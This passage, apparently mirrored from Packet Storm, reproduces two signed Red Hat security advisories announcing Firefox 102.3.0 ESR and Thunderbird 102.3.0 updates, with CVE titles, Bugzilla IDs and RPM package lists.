+UIwFXZS701yju9wl0sdAIYpcskUphrUchvZgiolbX8wwPHN36O0U1dBRyqM835J  
nv5Vtf9eycdfwHZy0vEyIo8HG7gz7hG+E4MUEzsPP3yov1j7RJNKt8vTWbyxCg0U  
rrW/j52Y4QM=  
=gF6E  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6710-01

Red Hat Security Advisory 2022-6711-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.3.0 ESR. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:6711-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6711  
Issue date:        2022-09-26  
CVE Names:         CVE-2022-40956 CVE-2022-40957 CVE-2022-40958   
                   CVE-2022-40959 CVE-2022-40960 CVE-2022-40962   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.3.0 ESR.

Security Fix(es):

* Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
(CVE-2022-40959)

* Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
(CVE-2022-40960)

* Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3  
(CVE-2022-40962)

* Mozilla: Bypassing Secure Context restriction for cookies with __Host and  
__Secure prefix (CVE-2022-40958)

* Mozilla: Content-Security-Policy base-uri bypass (CVE-2022-40956)

* Mozilla: Incoherent instruction cache when building WASM on ARM64  
(CVE-2022-40957)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2128792 - CVE-2022-40959 Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
2128793 - CVE-2022-40960 Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
2128794 - CVE-2022-40958 Mozilla: Bypassing Secure Context restriction for cookies with __Host and __Secure prefix  
2128795 - CVE-2022-40956 Mozilla: Content-Security-Policy base-uri bypass  
2128796 - CVE-2022-40957 Mozilla: Incoherent instruction cache when building WASM on ARM64  
2128797 - CVE-2022-40962 Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
firefox-102.3.0-6.el7_9.src.rpm

x86_64:  
firefox-102.3.0-6.el7_9.x86_64.rpm  
firefox-debuginfo-102.3.0-6.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
firefox-102.3.0-6.el7_9.i686.rpm  
firefox-debuginfo-102.3.0-6.el7_9.i686.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
firefox-102.3.0-6.el7_9.src.rpm

ppc64:  
firefox-102.3.0-6.el7_9.ppc64.rpm  
firefox-debuginfo-102.3.0-6.el7_9.ppc64.rpm

ppc64le:  
firefox-102.3.0-6.el7_9.ppc64le.rpm  
firefox-debuginfo-102.3.0-6.el7_9.ppc64le.rpm

s390x:  
firefox-102.3.0-6.el7_9.s390x.rpm  
firefox-debuginfo-102.3.0-6.el7_9.s390x.rpm

x86_64:  
firefox-102.3.0-6.el7_9.x86_64.rpm  
firefox-debuginfo-102.3.0-6.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

x86_64:  
firefox-102.3.0-6.el7_9.i686.rpm  
firefox-debuginfo-102.3.0-6.el7_9.i686.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
firefox-102.3.0-6.el7_9.src.rpm

x86_64:  
firefox-102.3.0-6.el7_9.x86_64.rpm  
firefox-debuginfo-102.3.0-6.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
firefox-102.3.0-6.el7_9.i686.rpm  
firefox-debuginfo-102.3.0-6.el7_9.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40956  
https://access.redhat.com/security/cve/CVE-2022-40957  
https://access.redhat.com/security/cve/CVE-2022-40958  
https://access.redhat.com/security/cve/CVE-2022-40959  
https://access.redhat.com/security/cve/CVE-2022-40960  
https://access.redhat.com/security/cve/CVE-2022-40962  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzH0N9zjgjWX9erEAQiAwg//X0LKGgOodugK6kITzPEX6kret9uH7Nd6  
eWOYy6LlObGhfm89Fo7oaUy+j2B6a1+8fou0wnp2zCDmKHfvj/M4NatO4PamXA90  
BykutKi0zZ/HtAWymmQzlp8unXSqolUB6m0QhsIFBdfbK1czpbRxUh2jPu2Ta5+W  
ajb2TNcG85Oo54QwGQ1ZEzqd2nkqmk2lIipy9xtgINrtOy8C0s9Cw6sPbn1RXmd7  
n804j9USNLV/vEVMUjUBI+NB6RAzJvZ5j7ECy8pTQsLdUOjGIS5FT8sC7ea92qXS  
IVfuv4oeY4LMMQJKZ0AekdMGnrLFh7RXoWBZkTPa64skrDAOG4b7Mp8fGMrZeJS6  
mIf4ZfxiTjHXLgbwfQLoo5RCPVOrKmdgNzKN3ZPfDtY54kRuOOR0Q8tS9mo+ktb4  
G+3N8uBUiEKw+Sd9qV/OKoEaV39YcE9+P0t2EAj6EzYXgKMZNH46HcBBwRcRQ8sF  
gSdbvSGgazHyCkckOZRzSbhj6M8HOqOQiVbL/uInw8V9IRs7PwSa9rc4QY7LEDLF  
nliD6kQ0NbYz7vdVRRqlawvXZrfpj3M0/kMCgvDsDDd6VFnr0qPugLYZvm2HMNL5  
zhCdXDMNpxH7ezWICJ9vFU5m8o7dohHWBS2vnyogIcaYDZ4CBao8vTDC49VaD9GZ  
NQ6pu/VK9bU=  
=5O5C  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6711-01

Red Hat Security Advisory 2022-6713-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.3.0. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:6713-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6713  
Issue date:        2022-09-26  
CVE Names:         CVE-2022-3032 CVE-2022-3033 CVE-2022-3034   
                   CVE-2022-36059 CVE-2022-40956 CVE-2022-40957   
                   CVE-2022-40958 CVE-2022-40959 CVE-2022-40960   
                   CVE-2022-40962   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.3.0.

Security Fix(es):

* Mozilla: Leaking of sensitive information when composing a response to an  
HTML email with a META refresh tag (CVE-2022-3033)

* Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
(CVE-2022-40959)

* Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
(CVE-2022-40960)

* Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3  
(CVE-2022-40962)

* Mozilla: Remote content specified in an HTML document that was nested  
inside an iframe's srcdoc attribute was not blocked (CVE-2022-3032)

* Mozilla: An iframe element in an HTML email could trigger a network  
request (CVE-2022-3034)

* Mozilla: Matrix SDK bundled with Thunderbird vulnerable to  
denial-of-service attack (CVE-2022-36059)

* Mozilla: Bypassing Secure Context restriction for cookies with __Host and  
__Secure prefix (CVE-2022-40958)

* Mozilla: Content-Security-Policy base-uri bypass (CVE-2022-40956)

* Mozilla: Incoherent instruction cache when building WASM on ARM64  
(CVE-2022-40957)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2123255 - CVE-2022-3032 Mozilla: Remote content specified in an HTML document that was nested inside an iframe's srcdoc attribute was not blocked  
2123256 - CVE-2022-3033 Mozilla: Leaking of sensitive information when composing a response to an HTML email with a META refresh tag  
2123257 - CVE-2022-3034 Mozilla: An iframe element in an HTML email could trigger a network request  
2123258 - CVE-2022-36059 Mozilla: Matrix SDK bundled with Thunderbird vulnerable to denial-of-service attack  
2128792 - CVE-2022-40959 Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
2128793 - CVE-2022-40960 Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
2128794 - CVE-2022-40958 Mozilla: Bypassing Secure Context restriction for cookies with __Host and __Secure prefix  
2128795 - CVE-2022-40956 Mozilla: Content-Security-Policy base-uri bypass  
2128796 - CVE-2022-40957 Mozilla: Incoherent instruction cache when building WASM on ARM64  
2128797 - CVE-2022-40962 Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
thunderbird-102.3.0-3.el8_4.src.rpm

aarch64:  
thunderbird-102.3.0-3.el8_4.aarch64.rpm  
thunderbird-debuginfo-102.3.0-3.el8_4.aarch64.rpm  
thunderbird-debugsource-102.3.0-3.el8_4.aarch64.rpm

ppc64le:  
thunderbird-102.3.0-3.el8_4.ppc64le.rpm  
thunderbird-debuginfo-102.3.0-3.el8_4.ppc64le.rpm  
thunderbird-debugsource-102.3.0-3.el8_4.ppc64le.rpm

s390x:  
thunderbird-102.3.0-3.el8_4.s390x.rpm  
thunderbird-debuginfo-102.3.0-3.el8_4.s390x.rpm  
thunderbird-debugsource-102.3.0-3.el8_4.s390x.rpm

x86_64:  
thunderbird-102.3.0-3.el8_4.x86_64.rpm  
thunderbird-debuginfo-102.3.0-3.el8_4.x86_64.rpm  
thunderbird-debugsource-102.3.0-3.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3032  
https://access.redhat.com/security/cve/CVE-2022-3033  
https://access.redhat.com/security/cve/CVE-2022-3034  
https://access.redhat.com/security/cve/CVE-2022-36059  
https://access.redhat.com/security/cve/CVE-2022-40956  
https://access.redhat.com/security/cve/CVE-2022-40957  
https://access.redhat.com/security/cve/CVE-2022-40958  
https://access.redhat.com/security/cve/CVE-2022-40959  
https://access.redhat.com/security/cve/CVE-2022-40960  
https://access.redhat.com/security/cve/CVE-2022-40962  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzH0LtzjgjWX9erEAQjkww//aB0FxGjWJ+ep1n3d5H7rcazn5Yk1gbxt  
EBpgmmL/JeX0KgrqLyVz2SiaY52njGg064SjOCYnAfJovIVIp26xFX0FMY2sc844  
xBgW/KE130rr7JOZhARvZyaLyqusKgC56NdN0tNw30mgR4DGwhkv4Ihiodzub376  
NponjXM+i/hZnD8xEL+bz8g+DDB/pda2nvsyITqxXcGhJomnTd1ovZvjLbcrV+XP  
JHE5G5Ln0+VmXXT9VSNx0q4y6OqPEMCaX0tbLIgJH1nYSLAKqGi9KSCru6gYa+/A  
vP+a6F4dcvhNEntNLCVOjYiyELF0PR2Ofe5SOzt+ole7igA4zvhXo0xVGh/i3wHI  
Fff3j+zqqeWyvsuo9jh+7b3hxL0Rn8WvSwutrR1bwrobC5HvMACADeQ7dSKNwwR5  
h7GbEFTKj0C2YZGY12AfKd2q9+0nZYdyATZsofX/SZ4YW9xI1kiCiF1BcbnOtP67  
v2nRvnwPS6VlECkbDQA2fBB/kjwoRZiO1wix+dGIeBYzfLFI/EXikmQSg7iGvb1t  
vjnaX7W6J1/pDIrt4xGNuUs/yaEMMUHRIvt4TSCiOuVljZUgNA9MbZ9DWl8q4WBD  
/GjDi4xOJSHX2lDL3DkC1Ie0mKsB1Pl9GGT+HTAHPFsmEA3pTjFtA+7lay8/9Jcn  
ATDPcvn3yiI=  
=xfpu  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm